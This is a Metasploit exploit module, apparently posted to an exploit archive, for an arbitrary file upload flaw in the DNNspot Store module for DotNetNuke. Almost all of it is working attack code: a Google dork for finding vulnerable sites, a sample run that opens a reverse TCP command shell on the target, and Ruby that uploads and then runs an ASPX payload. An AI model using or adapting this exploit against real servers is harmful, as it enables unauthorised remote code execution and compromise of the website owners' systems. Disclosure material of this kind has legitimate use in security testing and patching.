# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload # Date: 23/01/2014 # Author: Glafkos Charalambous # Version: 3.0.0 # Vendor: DNNspot # Vendor URL: https://www.dnnspot.com # Google Dork: inurl:/DesktopModules/DNNspot-Store/ # # root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/reverse_tcp LHOST=192.168.13.37 LPORT=31337 RHOST=192.168.31.33 RPORT=80 E # [*] Initializing modules... # payload => windows/shell/reverse_tcp # LHOST => 192.168.13.37 # LPORT => 31337 # RHOST => 192.168.31.33 # [-] Handler failed to bind to 192.168.13.37:31337 # [*] Started reverse handler on 0.0.0.0:31337 # [*] 192.168.31.33:80 - Uploading payload... # [*] 192.168.31.33:80 - Executing payload trrnegmv.aspx # [*] Encoded stage with x86/shikata_ga_nai # [*] Sending encoded stage (267 bytes) to 192.168.31.33 # [*] Command shell session 1 opened (192.168.13.37:31337 -> 192.168.31.33:56806) at 2014-08-28 20:56:23 +0300 # [+] Deleted trrnegmv.aspx # # Microsoft Windows [Version 6.2.9200] # (c) 2012 Microsoft Corporation. All rights reserved. # # C:\Windows\SysWOW64\inetsrv> # require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store module versions below 3.0.0. }, 'Author' => [ 'Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, 'Targets' => [ [ 'DNNspot-Store / Windows', {} ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 21 2014')) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx") }) if res and res.code == 200 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit @payload_name = "#{rand_text_alpha_lower(8)}.aspx" exe = generate_payload_exe aspx = Msf::Util::EXE.to_exe_aspx(exe) post_data = Rex::MIME::Message.new post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"") post_data.add_part("1", nil, nil, "form-data; name=\"productId\"") post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"") data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{peer} - Uploading payload...") res = send_request_cgi({ "method" => "POST", "uri" => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"), "data" => data, "ctype" => "multipart/form-data; boundary=#{post_data.bound}" }) unless res and res.code == 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end register_files_for_cleanup(@payload_name) print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name) }) end end